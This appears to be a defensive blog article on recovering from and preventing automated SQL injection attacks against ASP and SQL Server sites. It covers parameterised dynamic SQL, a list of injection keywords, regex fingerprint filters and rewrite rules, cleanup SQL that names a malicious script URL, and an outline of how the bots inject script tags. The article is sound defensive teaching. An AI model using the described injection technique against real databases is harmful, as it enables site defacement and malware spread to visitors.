  • If you have to use dynamic SQL in stored procedures that accept values from the site then use sp_executesql and not EXEC. A hacker could still exploit your system if you executed an unvalidated string within a stored procedure using EXEC(). You will also gain benefits from the system caching and reusing the generated query plans when you use this system procedure to execute your dynamic SQL instead of EXEC (see the short sketch after this list).
  • Make life hard for the hackers and don't show detailed error messages to your users when something goes wrong. Although the automated hack bots use brute force to hit every possible URL and parameter in the hope of finding a hole, a dedicated hacker probing your site feeds off the details provided to him when he comes across a 500 error. Although it's still possible to exploit a site blind, it's a lot harder and more time consuming than having the details of the SQL you are manipulating in front of you. It's amazing how many sites I still come across that show the SQL statement in their error messages. In fact a very popular developer resource site (I will mention no names) that hosts message boards and technical articles, including some about SQL injection best practices, continues to show me the SQL statement it uses to log members in whenever I visit and it times out. End users do not need to see this information as it's dangerous. Show them a nice friendly error message and then email yourself the details, or log them to a file or database if you really need to know what caused the error.
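To illustrate the sp_executesql point above, here is a minimal sketch (the table and parameter names are made up) showing the user supplied value travelling as a typed parameter rather than being concatenated into the SQL string:

DECLARE @SQL NVARCHAR(500), @CategoryID INT

-- value taken from the site, already validated as an integer
SELECT @CategoryID = 42

SELECT @SQL = N'SELECT ArticleID, Title FROM NEWS_ARTICLES WHERE CategoryFK = @CatID'

-- the parameter is passed separately so it can never change the shape of the statement,
-- and the generated query plan gets cached and reused
EXEC sp_executesql @SQL, N'@CatID INT', @CatID = @CategoryID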

Oops someone just hacked your site.


So you have just had a phone call from an angry customer complaining about a virus they have been infected with because they still use IE 5 to browse the web and they have just visited the home page of the site that your company hosts for them. Or maybe you have received one of Google's nice warning messages when you try to access the site yourself. Or maybe you just noticed the layout is screwed up because of broken tags and truncated HTML due to newly inserted SCRIPT tags that shouldn't be there. However you found out the wonderful news that your site has been exploited, you need to get moving as fast as possible and you need to know 2 main things:
1. How they managed to hack the site.
2. How much data has been compromised or, even worse, deleted.


Find the hole in the system.

There are many security and logging systems available for purchase, but I have a custom logging system on my sites: at the bottom of each page it logs some core information about the user and the page they are on (user-agent, client IP, URL etc) to a separate database. As well as using this for reporting traffic and user statistics, I have columns called IsHackAttempt and IsError, and a scheduled SQL Server Agent job that every 15 minutes looks at the last 15 minutes of unchecked traffic data and checks the query-string for common SQL/XSS injection fingerprints. If it finds any it updates the IsHackAttempt flag.
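The check itself doesn't need to be clever. A rough sketch of the kind of statement the agent job could run (the table and column names here are hypothetical) would be:

-- flag any unchecked requests whose query-string contains an obvious injection fingerprint
UPDATE dbo.TRAFFIC_LOG
SET IsHackAttempt = 1
WHERE IsChecked = 0
AND ( QueryString LIKE '%DECLARE%CAST(%'
OR QueryString LIKE '%;EXEC(%'
OR QueryString LIKE '%sysobjects%'
OR QueryString LIKE '%syscolumns%' )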

This enables me to run a report of all hack attempts over a set time period. You may find on large systems that you are constantly under attack from these bots, so you should look for hack attempts on pages that have just been updated or that have caused 500 errors. If you have SQL injection attempts that cause any sort of 500 error then you should investigate immediately as something is not right. If a hacker can raise an SQL error on your system then it's highly probable they can manipulate your SQL, most likely due to incorrect parameter sanitization.

If you don't have your own custom logging system then you can either hunt through your log files using a tool such as Microsoft's Log Parser http://www.securityfocus.com/infocus/1712 or bulk load the log files into a database for easy searching using SQL.

Some keywords and terms you should be looking for in GET data that would indicate an SQL hack attempt would include: exec, select, drop, delete, sys.objects, sysobjects, sys.columns, syscolumns, cast, varchar, user, @@version, @@servername, declare, update, table.

Most hacks will come through the query-string and therefore you should be able to find the hack in the log file. Hacks from a posted request will not show up in the log file unless you have written a custom method to log POST data, which I doubt many people do due to the overhead.
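If you do go down the bulk load route then finding the suspect requests is just a simple query. A sketch, assuming the log has been loaded into a table called IIS_LOG with the query-string in a csUriQuery column (both names are made up), might be:

SELECT LogDate, csUriStem, csUriQuery, cIP
FROM dbo.IIS_LOG
WHERE csUriQuery LIKE '%DECLARE%'
OR csUriQuery LIKE '%CAST(%'
OR csUriQuery LIKE '%sysobjects%'
OR csUriQuery LIKE '%@@version%'
ORDER BY LogDate DESC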


Use a bot to beat the bots.

There are many tools out there which help you find holes in your site and unfortunately they are also used by hackers to find the holes in your site so do yourself a favour and beat them to it.

Before any site goes live you should run a tool such as Paros Proxy http://www.parosproxy.org which will crawl your site and output a nice report detailing all possible exploitable holes in your system. As well as SQL injection it will look for XSS, CRLF and many other possible hacks. Run this against your development system as running it on the production system will slow it down as well as possibly filling your database up with crap if you do have exploitable holes. Once you have run this tool view the report and investigate all pages that have been flagged as possible sources for a hacker to hit.


A database restore is not always the answer.

The most common automated hacks at the moment involve an encoded SQL command that makes use of the system views available in SQL Server to output multiple UPDATE statements that insert a <script> tag into every possible text based column (char, varchar, nchar, nvarchar, text, ntext) in the database. This script will usually reference a .js file on some URL that tries to exploit well known holes in some older browsers through IFrames to download viruses and other spyware to the client's PC. Once you know the actual <script> tag that the exploit is using you can search your database to see how much data has been affected. It may be that a backup restoration is not required, and there is no point losing customer data by restoring the last known safe backup when it's not needed.


Hunting for affected rows and columns.

Using a script such as my find text within database script you can see how much of your data is affected. It may be that the SQL run by the hacker reached its command timeout limit before it could affect all your tables, and especially if you have a large database only a small percentage of the data may be affected. It's also important to know whether the hacker has purposely or accidentally overwritten or deleted any data as well as inserting his <script> tag. I have seen hacks where the value for the column being updated was wrapped in a CAST(column AS VARCHAR) statement, which meant that anything after 30 characters was lost. This is because the default length for a CAST to VARCHAR/CHAR when no length is supplied is 30 characters. This would mean your column would contain the reference to the virus infected site and nothing else, and in that case a simple replace would not help, as even after you removed it you would still be missing data.
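You can see the 30 character default for yourself with a quick test:

-- CAST to VARCHAR with no length specified defaults to 30 characters
SELECT CAST('123456789012345678901234567890ABCDEF' AS VARCHAR)
-- returns 123456789012345678901234567890 and the ABCDEF on the end is lost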

If the hacker has only inserted the <script> at the start or the end of the existing text, which seems to be the most common type, then we can easily remove the offending HTML by either using a script like my find and replace or reversing the code that the hacker used in the first place.

To reverse engineer the exploit you should URL decode the string, remove the EXEC(@S) statement at the end so you don't accidentally run it again, and replace it with a PRINT or SELECT so that when you run the SQL you actually see the CURSOR/LOOP that the exploit uses. You can then replace the hacker's UPDATE statement with one that REPLACEs the injected code with nothing.
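As a sketch of both steps (the clean up table and column are hypothetical, and the hex literal here is just a harmless stand-in that decodes to SELECT @@VERSION; in real life you paste in the full hex string from the attack and match its data type):

-- 1. decode the payload but PRINT it rather than EXEC it so nothing gets run
DECLARE @S VARCHAR(4000)
SET @S = CAST(0x53454C45435420404056455253494F4E AS VARCHAR(4000))
PRINT @S

-- 2. once you can see the hacker's UPDATE, reverse it with a REPLACE of your own
UPDATE dbo.NEWS_ARTICLES
SET ArticleBody = REPLACE(ArticleBody, '"></title><script src="http://www.vtg43.ru/script.js"></script><!--', '')
WHERE ArticleBody LIKE '%vtg43.ru%'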


Preventing re-infection.

Now we have removed the offending HTML or JavaScript we need to ensure that we don't get re-infected. If we haven't managed to find the code that allowed the hacker in, and we haven't got time to either check each page or rewrite the code to future proof it, then we need some sticking plasters until we do get time. I wouldn't recommend the following approaches as the only way to prevent SQL injection. However if you have a number of old sites on a server that have holes and are repeatedly getting hit then they will most certainly help filter out a large percentage of possible hack attempts, and they can also be used as another layer in your multi layered security approach.


Identify those bad bots and redirect them away from your site.

If you have been logging your users and hackers then you could try blocking future hackers in a number of ways.

  • Block IP addresses that have been the source of hack attempts at your firewall. However the problem with this is that the IP addresses will change constantly and you are blocking after the attack has occurred.
  • If your site is supposed to be a local or regional site, e.g. a UK jobs board, then you may decide that only traffic from the UK or Europe should be allowed. You could identify the countries that generate the most hack attempts from your traffic data and then block ranges belonging to those countries. To find out the IP ranges for any country use a site such as Country IP Blocks. The problem with this approach is that in a global economy legitimate traffic could come from anywhere in the world, and although China seems to be the source of the majority of the current hackbots it is also going to become the world's major economy in the next few years, so blocking the whole country may not be the best approach.
  • Block by user-agent. This will only work for those hackers that don't spoof legitimate browsers and use easily identifiable agents such as Rippers or Fake IE. Why would a legitimate user have a browser named Fake IE? I don't know either, but you could block them either through application code or through an ISAPI rewrite rule. There is no point using robots.txt as any hacker worthy of the name is going to ignore that.

Identify hackers as they attack your site.

Create a global include file that can be referenced by all your pages and place it at the top of all other includes so it's the first piece of code run by your site. Create a function that takes the Request.Querystring and Request.Form as parameters and checks for common SQL injection fingerprints. If any are found, redirect the user to a banned page.

I have also heard the idea that on this banned page you could try to gain some revenge by running an SQL WAITFOR DELAY statement to consume the attacker's connection time and slow them down a tad. However if you have a limit on the number of concurrent open database connections and you are being hammered by a zombie botnet then you are going to consume your connections with these WAIT commands, which will be detrimental to your other legitimate visitors. This could also be used against you as a form of SQL denial of service attack: if a user could automate a series of requests to these pages knowing that you have a connection limit, then once all the connections have been used up your site is basically out of action until a connection is released. On a database driven site this is something to be very aware of.

A message on the page informing them that they have been identified and logged will not do much good either, considering most of these bots originate overseas and come from anonymous proxies or unsuspecting users who have become part of a zombie network, but it's worth doing anyway just to scare those teenage hackers based in your own country who may be experimenting.

Your function could look a bit like this. The code is in VBScript due to its easy readability and I'm sure most people could convert it to their preferred language with little work.
Dim blBanUser : blBanUser = False
blBanUser = BanUser(Request.Querystring)
If Not(blBanUser) Then
    blBanUser = BanUser(Request.Form)
End If

If (blBanUser) Then
    Response.Redirect("/banned.asp")
End If

Function BanUser(strIN)

    ' decode the input first so URL encoded payloads are caught
    ' (URLDecode is a custom helper function, not a built-in VBScript method)
    strIN = URLDecode(strIN)

    Dim objRegExpr : Set objRegExpr = New RegExp

    With objRegExpr
        .IgnoreCase = True
        .Global = True

        ' DECLARE @x VARCHAR/NVARCHAR(nnnn|max) fingerprint
        .Pattern = "DECLARE @\w+ N?VARCHAR\((?:\d{1,4}|max)\)"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If

        ' references to the system views/tables
        .Pattern = "sys.?(?:objects|columns|tables)"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If

        ' the trailing EXEC(@x) call
        .Pattern = ";EXEC\(@\w+\);?"
        If .Test(strIN) Then
            BanUser = True
            Exit Function
        End If
    End With

    Set objRegExpr = Nothing

    BanUser = False
End Function
Rather than just logging attempted or successful hack attempts for reporting later, this type of plaster will prevent the most common SQL injections that are currently being executed by bots. I found that after implementing this function on a site that was receiving up to 2000 hack attempts each day, the number dropped to 2-5 per day.

The problems with this approach are that it will slow down the response time of your site, as every page load has to perform these checks, and the more data you submit the more there is to check. You could extend it, but the more checking you do the slower it will get.

You may also decide that, as the majority of hacks come through the query-string, checking the POST data is not required. Also this method only checks for a few fingerprints and the SQL injections are changing all the time. It may catch 99% of the attacks currently out there, but who is to say that a new type of attack that doesn't use those system tables or EXEC won't be rolled out in the following days. This is why some sort of logging and hack identifying system is advisable, as it means you can see the types of attack being used against you and then modify any defensive regular expressions as required.


ISAPI Filtering.

If you have the ability to add ISAPI rewriting to your site then you can place rules in an httpd.ini or .htaccess file that do similar regular expression fingerprint checks to the function above, but before any application code is run. You can do this for one site or for the whole server.

The benefit of using ISAPI rewriting is that it will be faster than getting your application to check for hack fingerprints, plus you can apply the plaster to the whole server in one hit for maximum effect. The downside is that you can only check the query-string and not the POST data. You also have the same issue of injection methods changing and having to update the file.

You could use the following 3 rules to prevent the majority of the automated hack bots at the moment. I have implemented these rules on my own sites and it has reduced the amount of hacks that get logged by roughly 95%.
# SQL INJECTION FINGERPRINTING
RewriteRule /.*?\.asp\?.*?DECLARE[^a-z]+\@\w+[^a-z]+N?VARCHAR\((?:\d{1,4}|max)\).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /.*?\.asp\?.*?sys.?(?:objects|columns|tables).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /(?:.*?\.asp\?.*?);EXEC\(\@\w+\);?.* /jobboard/error-pages/banned.asp [I,L,U]



Block access to system views.

A lot of the current hacks make use of the system views available in SQL Server that list out all the tables, columns, data types and any other useful information that would be a goldmine to a hacker. Giving them access to these views is like doing their work for them. They don't need to guess what names you have given the tables and columns in your database, as they have access to a list of all of them and can easily create a statement to loop through those of interest and create havoc.

In the majority of cases your website would not need access to these views, so blocking them would have no detrimental effect; however you should verify this first with your developers and DBAs. I personally tend to use them in parts of the system where I allow certain admin users to upload data into the system. It enables me to output the correct format for the upload (data type, column size, allow nulls etc) without having to worry about changing code if a column gets modified. So there are perfectly valid reasons that your site may need access to these views, however if your site doesn't then deny access to your website user, as although it will not stop all SQL injection attacks it will stop the current crop of automated bots that make use of the system views to create the necessary UPDATE statements. So although not perfect, if your system doesn't require access to them it's another useful layer of protection to add.
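As a minimal sketch, assuming the website connects as a database user called web_user (the name is made up), denying the metadata on SQL 2005 is a single statement:

-- stop web_user seeing object metadata through the catalog views
DENY VIEW DEFINITION TO web_user

-- on SQL 2000 you would deny SELECT on the system tables themselves instead, e.g.
-- DENY SELECT ON sysobjects TO web_user
-- DENY SELECT ON syscolumns TO web_user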


Conclusion

SQL injection is on the rise due to automated bots, which means any and all sites available on the Internet could fall victim. New sites should be developed with this in mind and should be implemented with a multi layered approach to prevention. This should take the form of data validation, parameterised queries and stored procedures, least privilege access for users including denying access to system views, hiding error messages from users, and the logging of hack attempts so that defences can be kept up to date.

For a detailed look at SQL injection methods see http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.

For an article about preventing SQL injection attacks in ASP.NET see http://msdn.microsoft.com/en-us/library/ms998271.aspx